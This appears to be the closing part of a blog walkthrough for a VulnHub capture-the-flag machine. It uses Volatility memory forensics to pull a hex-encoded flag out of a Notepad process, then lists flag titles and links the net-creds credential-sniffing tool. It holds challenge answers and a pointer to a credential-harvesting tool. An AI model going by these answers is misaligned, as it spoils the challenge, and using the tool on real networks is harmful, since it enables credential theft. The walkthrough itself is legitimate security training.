0x8662d808 services.exe 664 588 15 263 0 0 2016-10-10 21:59:14 UTC+0000
0x866a5670 lsass.exe 676 588 25 356 0 0 2016-10-10 21:59:14 UTC+0000
0x86358a70 vmacthlp.exe 848 664 1 25 0 0 2016-10-10 21:59:14 UTC+0000
0x86651da0 svchost.exe 860 664 21 202 0 0 2016-10-10 21:59:14 UTC+0000
0x865c2790 svchost.exe 944 664 11 258 0 0 2016-10-10 21:59:14 UTC+0000
0x86554020 svchost.exe 1040 664 82 1287 0 0 2016-10-10 21:59:14 UTC+0000
0x866196b8 svchost.exe 1092 664 5 59 0 0 2016-10-10 21:59:14 UTC+0000
0x8643ca18 svchost.exe 1144 664 17 213 0 0 2016-10-10 21:59:15 UTC+0000
0x866fca88 explorer.exe 1540 1520 14 417 0 0 2016-10-10 21:59:16 UTC+0000
0x8656b4d0 spoolsv.exe 1636 664 15 125 0 0 2016-10-10 21:59:16 UTC+0000
0x86338640 VGAuthService.e 1900 664 2 60 0 0 2016-10-10 21:59:25 UTC+0000
0x8667bda0 vmtoolsd.exe 2012 664 9 271 0 0 2016-10-10 21:59:28 UTC+0000
0x864f6440 wmiprvse.exe 488 860 14 251 0 0 2016-10-10 21:59:28 UTC+0000
0x864fbad0 wscntfy.exe 536 1040 1 31 0 0 2016-10-10 21:59:28 UTC+0000
0x85e5dd48 alg.exe 624 664 8 110 0 0 2016-10-10 21:59:28 UTC+0000
0x866f98b0 vmtoolsd.exe 1352 1540 7 242 0 0 2016-10-10 21:59:29 UTC+0000
0x86674410 ctfmon.exe 1356 1540 1 79 0 0 2016-10-10 21:59:29 UTC+0000
0x865bea48 CCleaner.exe 1388 1540 5 108 0 0 2016-10-10 21:59:29 UTC+0000
0x865c3d78 cmd.exe 1336 1540 1 30 0 0 2016-10-10 22:00:05 UTC+0000
0x8634fbb8 wuauclt.exe 1884 1040 9 198 0 0 2016-10-10 22:00:13 UTC+0000
0x86260a78 wuauclt.exe 1024 1040 6 172 0 0 2016-10-10 22:00:29 UTC+0000
0x8667b488 notepad.exe 268 1540 1 55 0 0 2016-10-10 22:00:41 UTC+0000
0x8640cc10 cmd.exe 1276 2012 0 -------- 0 0 2016-10-10 22:00:49 UTC+0000 2016-10-10 22:00:50 UTC+0000

Lets see in more about notepad.exe

volatility -f security-system.data pslist | grep notepad

Volatility Foundation Volatility Framework 2.60x8667b488 notepad.exe 268 1540 1 55 0 0 2016-10-10 22:00:41 UTC+0000

Lets get more detail about notepad.exe

volatility -f security-system.data cmdline --pid 268

Volatility Foundation Volatility Framework 2.6************************************************************************notepad.exe pid: 268Command line : "C:\WINDOWS\system32\NOTEPAD.EXE" C:\Documents and Settings\test\Desktop\code.txt

Now lets see data of notepad.exe

volatility -f security-system.data notepad

Volatility Foundation Volatility Framework 2.6Process: 268Text:?
Text:d
Text:
Text:?
Text:66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d

Wow got something now

66 6c 61 67 7b 38 34 31 64 64 33 64 62 32 39 62 30 66 62 62 64 38 39 63 37 62 35 62 65 37 36 38 63 64 63 38 31 7d

this become -->

flag{841dd3db29b0fbbd89c7b5be768cdc81}

After decode -> Twolittlemice

Finally We got our 8th Flag

So i learned a lot by solving this machine and by reading other's solution

Hope readers also learned from this walkthrough

Thanks to @jamesbower to make such awesome machine and vulnhub to hosting such machines for us and those who make solution for such machines so that we all learned

Thanks again 💗

Future OSCP

AAKASH CHOUDHARY

Flag #1 Home Sweet Home or (A Picture is Worth a Thousand Words)

Flag #2 When do Androids Learn to Walk?

Flag #3 Who Can You Trust?

Flag #4 Who Doesn't Love a Good Cocktail Party?

Flag #5 Another Day at the Office

Flag #6 Little Black Box

METHOD 1

https://github.com/DanMcInerney/net-creds

Flag #1 Don’t go Home Frank! There’s a Hex on Your House.

2. Flag #2 Obscurity or Security?

3. Flag #3 Be Careful Agent, Frank Has Been Known to Intercept Traffic Our Traffic.

Flag #4 A Good Agent is Hard to Find

Flag #5 The Devil is in the Details - Or is it Dialogue? Either Way, if it’s Simple, Guessable, or Personal it Goes Against Best Practices

Flag #6 Where in the World is Frank?

PRIVILEGE ESCALATION

Popular Posts

Contact Us

Blog Archive

Text Widget

Popular Posts

About Me

Recent Posts

Popular Posts

Future OSCP